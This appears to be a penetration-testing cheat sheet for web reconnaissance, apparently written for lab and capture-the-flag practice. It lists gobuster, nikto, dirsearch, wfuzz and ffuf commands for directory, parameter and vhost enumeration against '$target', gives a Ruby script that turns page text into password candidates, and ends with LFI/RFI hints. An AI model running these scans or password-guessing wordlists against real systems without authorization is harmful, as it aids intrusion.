Directory enumeration
Hints:
- Add –insecuressl when dealing with HTTPS.
- Don’t forget to search for exploits for standard cgi files!
- Use dirbuster (UI) as well. Why not…
General search
nikto -host $victim gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
If there is the error “Error: error on parsing arguments: status-codes (“200”) and status-codes-blacklist (“404”) are both set — please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.”, use the ‑b flag:
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -b 301
Alternative with dirsearch:
python3 /opt/dirsearch/dirsearch.py -u http://$target/ --random-agent -e php,html,sql -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r [--header "Authorization: Basic b2Zmc2VjOmVsaXRl"]
Searching for file suffixes
proxychains4 -q dirb http://$target/index /opt/wfuzz/wordlist/general/extensions_common.txt -t gobuster dir -u http://$target -t 40 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.bak,.txt,.sql,.zip,.xml,.db,.sh
Search for cgi-bin related things
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200,204,301,302,307,403,500' -e gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200' -e
Search within parameters
- Assume, there is an URL like /index?file=bla.php
- Then, use Gobuster with the length parameter and note the size of the error document:
gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard - Perform the search and remove all lines which have the exact size:
gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard -x .php,.inc,.htm,.html | grep -v 2720
Search for endpoints / URLs
Use hakrawler to crawl the site and to return a list of unique endpoints from this site.
echo "http://$target" | hakrawler -u
Creating wordlists from documents / HTML pages
With curl
curl http://$target/website | grep -oE '\w+' | sort -u -f | more
With Ruby
Use this Ruby script and add your HTML output / text to extract significant words you could try as password or in a gobuster wordlist.
require 'set'
# Sample stopwords list (add more based on the language you're working with)
STOPWORDS = Set.new(%w[the and is in of to for a on that by as with it at from this be an or are])
# Function to extract potential passwords from the text
def extract_significant_words(text)
# Split the text into words, remove punctuation, and filter out stopwords and short words
words = text.scan(/\b\w+\b/)
.map(&:downcase) # Normalize to lowercase
.reject { |word| word.length <= 4 || STOPWORDS.include?(word) }
# Count word frequencies
frequency = Hash.new(0)
words.each { |word| frequency[word] += 1 }
# Filter out overly common words (words that occur too many times)
threshold = words.size / 50 # Adjust this threshold as necessary
significant_words = frequency.select { |word, count| count <= threshold }
# Return the unique significant words
significant_words.keys
end
# Example usage
text = <<-TEXT
Gaara is a character in the Naruto anime. He is a ninja from Sunagakure and became the Kazekage. Gaara fights using sand, controlled by his connection to Shukaku, the tailed beast.
TEXT
# Extract and print significant words
password_candidates = extract_significant_words(text)
puts password_candidates
Fuzzing parameters
With Wfuzz:
wfuzz -z range,0-10 --hl 97 http://$target/sator.php?p1=FUZZ
Excluding content: This makes requests from 0–100 for the post parameter id_no and excludes all respones where the response body doesn’t confirm to the regexp — here just a 3..
wfuzz -z range,0-100 -d "id_no=FUZZ" --hs 3 "http://faculty.htb/admin/ajax.php?action=login_faculty"
Interesting files
Vhost enumeration
ffuf -u http://linkvortex.htb/ -w subdomains.txt -H "Host: FUZZ.linkvortex.htb" -mc 200
Alternative:
gobuster -u http://$VICTIM_DOMAIN/ --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 60
Alternative:
dnsrecon -d domain.com -D vhost_names.txt -t brt
Other techniques
- Use local file inclusion (LFI)
- Try to change a filename to read/parse a local file.
- Use remote file inclusion (RFI)
- Try to add a protocol like http:// to include a file from another server (my)
Leave a Reply
You must be logged in to post a comment.